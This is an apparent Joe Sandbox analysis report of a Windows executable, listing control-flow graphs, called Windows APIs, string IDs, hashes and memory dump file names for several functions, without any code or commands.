                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5B1E67660028AAFDB60CF68CC80BDA73E5FF88714F158564EA08AB341D774FA51CB94

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 95 173d40-173df9 GetPEB call 173560 FreeConsole call 171000 * 2 102 173ec7-173ecc 95->102 103 173dff 95->103 104 173f40-173f45 102->104 105 173ece-173ed3 102->105 106 173f10-173f15 103->106 111 1740cb-1740da 104->111 112 173f4b-173f50 104->112 107 174054-174074 call 173560 105->107 108 173ed9-173ede 105->108 109 173fd0-173fd5 106->109 110 173f1b-173f20 106->110 107->102 135 17407a 107->135 114 173ee4-173ee9 108->114 115 17407f-174090 108->115 116 1740e5-1740fe 109->116 117 173fdb-173fe0 109->117 119 173f26-173f2b 110->119 120 17409b-1740a5 110->120 111->102 113 1740e0 111->113 121 173f56-173f7d 112->121 122 173ec0-173ec5 112->122 113->116 114->122 123 173eeb-173f09 TranslateMessage 114->123 115->102 127 174096 115->127 124 174100-174106 116->124 117->122 125 173fe6-174049 117->125 128 173e04-173ebf TranslateMessage 119->128 129 173f31-173f36 119->129 137 1740ac-1740c0 120->137 130 173f82-173f85 121->130 122->102 122->106 123->102 147 173f0b 123->147 132 174130-174136 124->132 133 174108-17410e 124->133 125->102 134 17404f 125->134 127->106 128->122 129->122 136 173f38-1741a5 call 18e8c8 129->136 130->130 131 173f87-173fa5 130->131 141 17416c-174187 132->141 142 174138-17413e 132->142 139 174151-174168 133->139 140 174110-174116 133->140 134->106 135->106 137->102 145 1740c6 137->145 139->133 150 17416a 139->150 140->124 148 174118-174125 140->148 141->102 151 17418d 141->151 142->124 149 174140-17414d 142->149 145->106 147->106 148->133 153 174127 148->153 149->133 154 17414f 149->154 150->132 151->106 153->132 154->132
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeConsole.KERNELBASE ref: 00173DBD
                                                                                                                                                                                                                                        • TranslateMessage.USER32(00000000), ref: 00173EF4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleFreeMessageTranslate
                                                                                                                                                                                                                                        • String ID: BiI=$BiI=$BiI=$BiI=
                                                                                                                                                                                                                                        • API String ID: 1800032279-1986682903
                                                                                                                                                                                                                                        • Opcode ID: 6e61d90544cc728d1867b34ceaf7e8a44279d0e0b5282432f285d0651e1683d8
                                                                                                                                                                                                                                        • Instruction ID: 40a5511d90d39de1882696b0f374ba7f1cb8973b17160044e043f7564ba06d7b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e61d90544cc728d1867b34ceaf7e8a44279d0e0b5282432f285d0651e1683d8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAA13535A041058FDB28DF68D895AAEBBF1EB94350F24C42AF91AD7390CB34DD81DB52

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 155 1741b0-17421e 156 174220-174225 155->156 157 174227-17422c 156->157 158 174250-174255 156->158 161 174237-17424d 157->161 162 17422e-174233 157->162 159 174257-17425c 158->159 160 174271-17427d 158->160 159->156 163 17425e-17426f call 177140 159->163 164 174282-17428c 160->164 161->157 166 17424f 161->166 162->156 165 174235-1742ae 162->165 163->164 164->157 168 17428e 164->168 171 174337-17433c 165->171 172 1742b4 165->172 166->158 168->158 174 174342-174347 171->174 175 1743e0-1743e5 171->175 173 174380-174385 172->173 176 174410-174415 173->176 177 17438b-174390 173->177 180 17434d-174352 174->180 181 17446a-17446f 174->181 178 174536-17453b 175->178 179 1743eb-1743f0 175->179 192 1747b7-1747f3 176->192 193 17441b-174420 176->193 182 174396-17439b 177->182 183 174494-174499 177->183 186 174541-174546 178->186 187 17494a-17495b 178->187 188 1743f6-1743fb 179->188 189 174740-1747ac call 199f54 call 19b9bd call 19ac8e call 175960 call 19b2f6 call 19c51c call 19b677 call 19ac8e 179->189 190 174551-17459c call 19ca10 call 175c90 call 172de0 180->190 191 174358-17435d 180->191 184 174475-17447a 181->184 185 174833-174857 181->185 197 174724-174735 182->197 198 1743a1-1743a6 182->198 201 174862-1748c3 call 199f54 call 19b9bd call 19ac8e call 175960 call 19b2f6 call 19c51c call 19b677 call 19ac8e 183->201 202 17449f-1744a4 183->202 199 174330-174335 184->199 200 174480-17448f 184->200 185->171 208 17485d 185->208 186->199 203 17454c 186->203 196 174960-174965 187->196 188->199 207 174401 188->207 189->171 318 1747b2 189->318 260 1745a0-1745a5 190->260 191->199 209 17435f-174379 191->209 192->171 206 1747f9 192->206 194 174426-17442b 193->194 195 1747fe-174828 193->195 194->199 216 174431-17445f 194->216 195->171 221 17482e 195->221 217 174ae4-174b05 call 175670 196->217 218 17496b-174970 196->218 197->171 211 17473b 197->211 198->199 212 1743a8-1743b0 call 173d40 198->212 199->171 199->173 219 174523-17452b 200->219 317 1748c8-174940 201->317 202->199 220 1744aa-174508 call 174bd0 call 19ca10 call 175c90 call 175960 call 19b2f6 202->220 213 174ba7-174bcf call 176f00 call 18e8c8 203->213 206->173 207->176 208->173 209->171 210 17437b 209->210 210->173 211->173 236 1743b5-1743d2 212->236 216->171 230 174465 216->230 217->218 244 174b0b 217->244 231 174976-17497b 218->231 232 174b5d-174b9c 218->232 219->171 225 174531 219->225 294 17450d-17451e 220->294 221->173 225->173 230->173 231->196 241 17497d-1749fc 231->241 232->171 237 174ba2 232->237 236->171 245 1743d8 236->245 237->213 249 174a00-174a06 241->249 244->217 245->173 255 174a30-174a36 249->255 256 174a08-174a0e 249->256 263 174aa6-174ab7 255->263 264 174a38-174a3e 255->264 261 174a10-174a16 256->261 262 174a1d-174a28 256->262 269 1746fb-17471c call 175670 260->269 270 1745ab-1745b0 260->270 261->249 271 174a18-174ade 261->271 262->256 272 174a2a 262->272 263->256 266 174abd 263->266 264->249 273 174a40-174a9e 264->273 266->255 269->270 290 174722 269->290 278 1745b6-1745bb 270->278 279 174b0d-174b52 270->279 271->217 271->218 272->255 273->256 281 174aa4 273->281 278->260 288 1745bd-17462f 278->288 279->171 286 174b58 279->286 281->255 286->173 293 174630-174636 288->293 290->269 297 174660-174666 293->297 298 174638-17463e 293->298 294->219 303 1746c5-1746d6 297->303 304 174668-17466e 297->304 301 174640-174646 298->301 302 17464d-174658 298->302 301->293 307 174648-1746f5 301->307 302->298 308 17465a 302->308 303->298 310 1746dc 303->310 304->293 309 174670-1746bd 304->309 307->269 307->270 308->297 309->298 314 1746c3 309->314 310->297 314->297 317->187 318->173
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Dxy$Dxy
                                                                                                                                                                                                                                        • API String ID: 0-1145654414
                                                                                                                                                                                                                                        • Opcode ID: a04f70f235ccf2b5703b15d0f79f1faaffdafae4a4bf7e1090bf15321b1abffb
                                                                                                                                                                                                                                        • Instruction ID: fd4cef50fcaf9c6bcf4645507bf94a570214ce7d461e00d4cd96ae5604eb5418
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a04f70f235ccf2b5703b15d0f79f1faaffdafae4a4bf7e1090bf15321b1abffb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3132EF756093008FDB288A28D89576FBBF2ABD6740F25882DF49D8B352D775CC488B53

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 472 174bd0-174c13 call 1795f0 475 174c15 472->475 476 174c8b-174c90 472->476 477 1753b0-1753b5 475->477 478 174c96-174c9b 476->478 479 174e50-174e55 476->479 484 1753b7-1753bc 477->484 485 1753f0-1753f5 477->485 480 174ca1-174ca6 478->480 481 174fc0-174fd2 478->481 482 174e5b-174e60 479->482 483 175108-175178 479->483 486 174c80-174c85 480->486 487 174ca8-174d26 480->487 481->476 491 174fd8 481->491 482->486 490 174e66-174eaa 482->490 492 1753e0-1753e8 483->492 493 175404-175416 484->493 494 1753be-1753c3 484->494 488 1753f7-1753fc 485->488 489 17541e-17543d 485->489 486->476 486->477 496 174d30-174d35 487->496 488->486 497 175402-17556b call 18b600 call 190998 488->497 489->476 500 175443 489->500 498 174eb0-174eb5 490->498 491->477 492->476 495 1753ee 492->495 493->476 499 17541c 493->499 494->486 501 1753c9-1753d8 494->501 495->477 502 174d37-174d3c 496->502 503 174da0-174da5 496->503 539 175570-175575 497->539 505 174eb7-174ebc 498->505 506 174f10-174f15 498->506 499->477 500->477 501->492 507 174d3e-174d43 502->507 508 174d4a-174d95 502->508 511 174da7-174dac 503->511 512 174dcc-174e42 503->512 509 174ebe-174ec3 505->509 510 174eca-174f0d 505->510 514 174f17-174f1c 506->514 515 174f38-174fb5 506->515 507->496 516 174d45-175068 call 1797e0 call 179a30 507->516 508->502 517 174d97 508->517 509->498 518 174ec5-17521b call 1797e0 call 179a30 509->518 510->505 519 174f0f 510->519 511->496 520 174dae-174dc4 511->520 512->502 528 174e48 512->528 514->498 522 174f1e-174f34 514->522 515->505 529 174fbb 515->529 552 175070-175076 516->552 517->503 553 175220-175226 518->553 519->506 520->502 538 174dca 520->538 522->505 535 174f36 522->535 528->503 529->506 535->506 538->503 542 175577-17557c 539->542 543 17559e-1755b1 call 18e340 539->543 547 1755b5-1755cb 542->547 548 17557e-175583 542->548 543->542 554 1755b3 543->554 551 1755d0-1755d5 547->551 548->539 549 175585-17559c 548->549 549->542 549->543 555 1755d7-1755dc 551->555 556 1755f9-175610 551->556 557 1750a0-1750a6 552->557 558 175078-17507e 552->558 559 175260-175266 553->559 560 175228-17522e 553->560 554->543 565 175614-17562e call 18e8c8 555->565 566 1755de-1755e3 555->566 556->555 587 175612 556->587 561 1750ac-1750b2 557->561 562 174c1a-174c7e 557->562 567 1750f5-175100 558->567 568 175080-175086 558->568 563 1752e5-17532d call 17ead0 559->563 564 175268-17526e 559->564 569 175234-17523a 560->569 570 1752cf-1752da 560->570 561->552 572 1750b4-1750f1 561->572 562->486 585 175330-1753a6 563->585 564->553 584 17526f-1752c7 564->584 566->551 576 1755e5-1755f7 566->576 567->558 574 175106 567->574 568->552 579 175088-17509c 568->579 569->553 571 17523c-175250 569->571 570->560 575 1752e0 570->575 571->560 582 175252-17525f 571->582 572->558 583 1750f3 572->583 574->557 575->559 576->555 576->556 579->558 581 17509e 579->581 581->557 582->559 583->557 584->560 588 1752cd 584->588 585->476 589 1753ac 585->589 587->556 588->559 589->477
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: k{$k{
                                                                                                                                                                                                                                        • API String ID: 0-299118743
                                                                                                                                                                                                                                        • Opcode ID: 7345bd0f926f518659788e768529e6a643839c200ddd8f7691cf8091a4b53cec
                                                                                                                                                                                                                                        • Instruction ID: 8d562c2259b13363f310084bbf52a69823d9365e48a9d65e17e88686a2336081
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7345bd0f926f518659788e768529e6a643839c200ddd8f7691cf8091a4b53cec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 644226367086018FCB18CA28D8D56AE7BF2AFD9354F69C91DE44AC7351DB36CC468B81
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9cda78cbb56e991a47022177f5df7a11db8c1c086346e52c876f8c26fef28de9
                                                                                                                                                                                                                                        • Instruction ID: cb4a5e444681f527ab0456a3d38279ef5fd4a114e1526e469dc0df85896f16d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cda78cbb56e991a47022177f5df7a11db8c1c086346e52c876f8c26fef28de9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED512632B001458FDB1C9A3C88957BE7BE2EB86309F28C9A6E442D7355C736DE469F50

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 001AE03E: CreateFileW.KERNELBASE(00000000,00000000,?,001ADCE2,?,?,00000000,?,001ADCE2,00000000,0000000C), ref: 001AE05B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001ADD4D
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 001ADD54
                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 001ADD60
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001ADD6A
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 001ADD73
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001ADD93
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(001A801D), ref: 001ADEE0
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 001ADF12
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 001ADF19
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4237864984-0
                                                                                                                                                                                                                                        • Opcode ID: d234ba36cc7a84962bd65e927a5ce094cc89119a1e2f0b7e31b5f659f8bb7b6d
                                                                                                                                                                                                                                        • Instruction ID: fac9715352585f5574cb47d6c28d1b7881a0c9f50826613c6b26f703a87c96e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d234ba36cc7a84962bd65e927a5ce094cc89119a1e2f0b7e31b5f659f8bb7b6d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3A12436A046549FCF19DF68EC51BAE3BA1AB17320F18014DF812AF2E2CB758842CB51

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 319 1a85fc-1a860c 320 1a860e-1a8621 call 199eb7 call 199ea4 319->320 321 1a8626-1a8628 319->321 335 1a8980 320->335 323 1a8968-1a8975 call 199eb7 call 199ea4 321->323 324 1a862e-1a8634 321->324 342 1a897b call 19a5c9 323->342 324->323 327 1a863a-1a8663 324->327 327->323 330 1a8669-1a8672 327->330 333 1a868c-1a868e 330->333 334 1a8674-1a8687 call 199eb7 call 199ea4 330->334 338 1a8964-1a8966 333->338 339 1a8694-1a8698 333->339 334->342 341 1a8983-1a8986 335->341 338->341 339->338 340 1a869e-1a86a2 339->340 340->334 344 1a86a4-1a86bb 340->344 342->335 347 1a86bd-1a86c0 344->347 348 1a86f0-1a86f6 344->348 350 1a86c2-1a86c8 347->350 351 1a86e6-1a86ee 347->351 352 1a86ca-1a86e1 call 199eb7 call 199ea4 call 19a5c9 348->352 353 1a86f8-1a86ff 348->353 350->351 350->352 355 1a8763-1a8782 351->355 384 1a889b 352->384 356 1a8703-1a8721 call 19f9b9 call 19f97f * 2 353->356 357 1a8701 353->357 360 1a8788-1a8794 355->360 361 1a883e-1a8847 call 1ab1ef 355->361 388 1a873e-1a8761 call 1a62c2 356->388 389 1a8723-1a8739 call 199ea4 call 199eb7 356->389 357->356 360->361 362 1a879a-1a879c 360->362 373 1a88b8 361->373 374 1a8849-1a885b 361->374 362->361 366 1a87a2-1a87c3 362->366 366->361 370 1a87c5-1a87db 366->370 370->361 375 1a87dd-1a87df 370->375 377 1a88bc-1a88d2 ReadFile 373->377 374->373 379 1a885d-1a886c GetConsoleMode 374->379 375->361 380 1a87e1-1a8804 375->380 382 1a8930-1a893b GetLastError 377->382 383 1a88d4-1a88da 377->383 379->373 385 1a886e-1a8872 379->385 380->361 387 1a8806-1a881c 380->387 390 1a893d-1a894f call 199ea4 call 199eb7 382->390 391 1a8954-1a8957 382->391 383->382 392 1a88dc 383->392 386 1a889e-1a88a8 call 19f97f 384->386 385->377 393 1a8874-1a888c ReadConsoleW 385->393 386->341 387->361 397 1a881e-1a8820 387->397 388->355 389->384 390->384 394 1a895d-1a895f 391->394 395 1a8894-1a889a call 199eca 391->395 401 1a88df-1a88f1 392->401 402 1a888e GetLastError 393->402 403 1a88ad-1a88b6 393->403 394->386 395->384 397->361 406 1a8822-1a8839 397->406 401->386 410 1a88f3-1a88f7 401->410 402->395 403->401 406->361 414 1a88f9-1a8909 call 1a8a05 410->414 415 1a8910-1a891d 410->415 424 1a890c-1a890e 414->424 416 1a8929-1a892e call 1a8ca9 415->416 417 1a891f call 1a8987 415->417 425 1a8924-1a8927 416->425 417->425 424->386 425->424
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 400b0c970c9f1558ebfc14f6c8d575db1709c2ff20e2497608ad6cb6fe87746c
                                                                                                                                                                                                                                        • Instruction ID: 865927f312edf24c4f6c255669650b895d81d2f121d4c509d2e9bf07acaaf664
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 400b0c970c9f1558ebfc14f6c8d575db1709c2ff20e2497608ad6cb6fe87746c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11B1E178E04249AFDF15DFA8C881BBE7BB1FF5A314F544158E404AB292CB749D42CBA1

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 591 1a7256-1a7278 592 1a746b 591->592 593 1a727e-1a7280 591->593 596 1a746d-1a7471 592->596 594 1a72ac-1a72cf 593->594 595 1a7282-1a72a1 call 19a772 593->595 598 1a72d1-1a72d3 594->598 599 1a72d5-1a72db 594->599 602 1a72a4-1a72a7 595->602 598->599 601 1a72dd-1a72ee 598->601 599->595 599->601 603 1a72f0-1a72fe call 1a6302 601->603 604 1a7301-1a7311 call 1a7583 601->604 602->596 603->604 609 1a735a-1a736c 604->609 610 1a7313-1a7319 604->610 613 1a736e-1a7374 609->613 614 1a73c3-1a73e3 WriteFile 609->614 611 1a731b-1a731e 610->611 612 1a7342-1a7358 call 1a7600 610->612 615 1a7329-1a7338 call 1a79c7 611->615 616 1a7320-1a7323 611->616 634 1a733b-1a733d 612->634 620 1a73af-1a73bc call 1a7a2f 613->620 621 1a7376-1a7379 613->621 618 1a73ee 614->618 619 1a73e5-1a73eb GetLastError 614->619 615->634 616->615 622 1a7403-1a7406 616->622 626 1a73f1-1a73fc 618->626 619->618 633 1a73c1 620->633 627 1a739b-1a73ad call 1a7bf3 621->627 628 1a737b-1a737e 621->628 629 1a7409-1a740b 622->629 635 1a73fe-1a7401 626->635 636 1a7466-1a7469 626->636 641 1a7396-1a7399 627->641 628->629 630 1a7384-1a7391 call 1a7b0a 628->630 637 1a7439-1a7445 629->637 638 1a740d-1a7412 629->638 630->641 633->641 634->626 635->622 636->596 644 1a744f-1a7461 637->644 645 1a7447-1a744d 637->645 642 1a742b-1a7434 call 199f30 638->642 643 1a7414-1a7426 638->643 641->634 642->602 643->602 644->602 645->592 645->644
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 001A7600: GetConsoleOutputCP.KERNEL32(3E6C43DE,00000000,00000000,?), ref: 001A7663
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,001959E1,?,00195C43), ref: 001A73DB
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,001959E1,?,00195C43,?,00195C43,?,?,?,00000000,?,?,00000000,?,?,?), ref: 001A73E5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2915228174-0
                                                                                                                                                                                                                                        • Opcode ID: e701ae109726faf12dd095887ba7631dc7a57924088db00b6946cbffe2a64a31
                                                                                                                                                                                                                                        • Instruction ID: 5ad5fdf643f476aeb1bc69def176d85467b8b93d8cd4ac23bc85a9ee379ad445
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e701ae109726faf12dd095887ba7631dc7a57924088db00b6946cbffe2a64a31
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2619079908119AFDF15DFA8CC84EAEBFB9BF1A304F150145F804A7292D332DA05DBA1

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 648 1a7a2f-1a7a84 call 191c00 651 1a7af9-1a7b09 call 18e8c8 648->651 652 1a7a86 648->652 653 1a7a8c 652->653 655 1a7a92-1a7a94 653->655 657 1a7aae-1a7ad3 WriteFile 655->657 658 1a7a96-1a7a9b 655->658 661 1a7af1-1a7af7 GetLastError 657->661 662 1a7ad5-1a7ae0 657->662 659 1a7a9d-1a7aa3 658->659 660 1a7aa4-1a7aac 658->660 659->660 660->655 660->657 661->651 662->651 663 1a7ae2-1a7aed 662->663 663->653 664 1a7aef 663->664 664->651
